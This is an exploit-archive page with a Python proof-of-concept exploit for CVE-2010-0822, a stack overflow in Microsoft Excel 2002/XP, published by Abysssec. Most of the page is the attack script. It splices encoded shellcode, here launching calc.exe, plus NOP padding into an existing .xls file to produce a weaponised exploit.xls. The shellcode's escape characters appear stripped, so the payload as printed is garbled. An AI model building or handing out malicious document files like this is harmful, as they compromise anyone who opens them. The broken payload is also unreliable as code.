[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow
# Published : 2010-09-24
# Author : Abysssec
# Previous Title : SnackAmp 3.1.3B Malicious SMP Buffer Overflow Vulnerability (SEH)
# Next Title : Quick Player 1.3 Unicode SEH Exploit 


'''
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ < 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/
http://www.exploit-db.com/sploits/moaub-24-excel-exploit.zip
'''

'''
  
  Title               :  Microsoft Excel OBJ Record Stack Overflow
  Version             :  Excell 2002 and XP (SP3)
  Analysis            :  http://www.abysssec.com
  Vendor              :  http://www.microsoft.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec
  CVE                 :  CVE-2010-0822

'''


import sys

def main():
   
    try:
		fdR = open('src.xls', 'rb+')
		strTotal = fdR.read()
		str1 = strTotal[:36640]
		str2 = strTotal[37440:]
				
		# shellcode calc.exe
		shellcode = 'x90x90x90x89xE5xD9xEExD9x75xF4x5Ex56x59x49x49x49x49x49x49x49x49x49x49x43x43x43x43x43x43x37x51x5Ax6Ax41x58x50x30x41x30x41x6Bx41x41x51x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41x42x75x4Ax49x4Bx4Cx4Bx58x51x54x43x30x43x30x45x50x4Cx4Bx51x55x47x4Cx4Cx4Bx43x4Cx43x35x44x38x45x51x4Ax4Fx4Cx4Bx50x4Fx44x58x4Cx4Bx51x4Fx47x50x45x51x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43x31x4Ax4Ex46x51x49x50x4Ax39x4Ex4Cx4Cx44x49x50x42x54x45x57x49x51x48x4Ax44x4Dx45x51x49x52x4Ax4Bx4Bx44x47x4Bx46x34x46x44x45x54x43x45x4Ax45x4Cx4Bx51x4Fx47x54x43x31x4Ax4Bx43x56x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4Bx43x31x4Ax4Bx4Cx49x51x4Cx47x54x45x54x48x43x51x4Fx46x51x4Cx36x43x50x46x36x45x34x4Cx4Bx50x46x50x30x4Cx4Bx47x30x44x4Cx4Cx4Bx44x30x45x4Cx4Ex4Dx4Cx4Bx42x48x44x48x4Dx59x4Bx48x4Bx33x49x50x43x5Ax46x30x45x38x4Cx30x4Cx4Ax45x54x51x4Fx42x48x4Dx48x4Bx4Ex4Dx5Ax44x4Ex50x57x4Bx4Fx4Ax47x43x53x47x4Ax51x4Cx50x57x51x59x50x4Ex50x44x50x4Fx46x37x50x53x51x4Cx43x43x42x59x44x33x43x44x43x55x42x4Dx50x33x50x32x51x4Cx42x43x45x31x42x4Cx42x43x46x4Ex45x35x44x38x42x45x43x30x41x41'
		
		if len(shellcode) > 800:
			print "[*] Error : Shellcode length is long"
			return
		if len(shellcode) <= 800:
			dif = 800 - len(shellcode)
			while dif > 0 :
				shellcode += 'x90'
				dif = dif - 1
				
		fdW= open('exploit.xls', 'wb+')
		fdW.write(str1)		
		fdW.write(shellcode)
		fdW.write(str2)
		
		fdW.close()
		fdR.close()
		print '[-] Excel file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
                
if __name__ == '__main__':
    main()